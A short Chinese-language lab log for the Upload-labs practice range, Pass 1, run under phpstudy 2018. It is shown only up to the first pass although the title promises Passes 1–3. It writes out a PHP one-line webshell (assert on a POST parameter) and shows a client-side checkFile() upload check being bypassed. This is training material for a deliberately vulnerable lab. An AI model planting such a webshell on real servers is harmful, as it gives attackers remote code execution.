如下为Upload-labs-master Pass1~3闯关日志:
首先先进行环境配置:
我这里用的是phpstudy 2018
Pass 1
ok,首先我们来到第一关,我们先尝试直接传入一句话木马 <?php @assert($_POST[123]); ?>
很显然啊,他这里对上传的文件进行了特殊的要求,因此我们先来看一下他的源代码,看看能不能从源代码入手(F12)
很幸运啊,我们找到了源代码中的判断语句<form enctype="multipart/form-data" method="post" οnsubmit="return checkFile()">
οnsubmit=”return false;”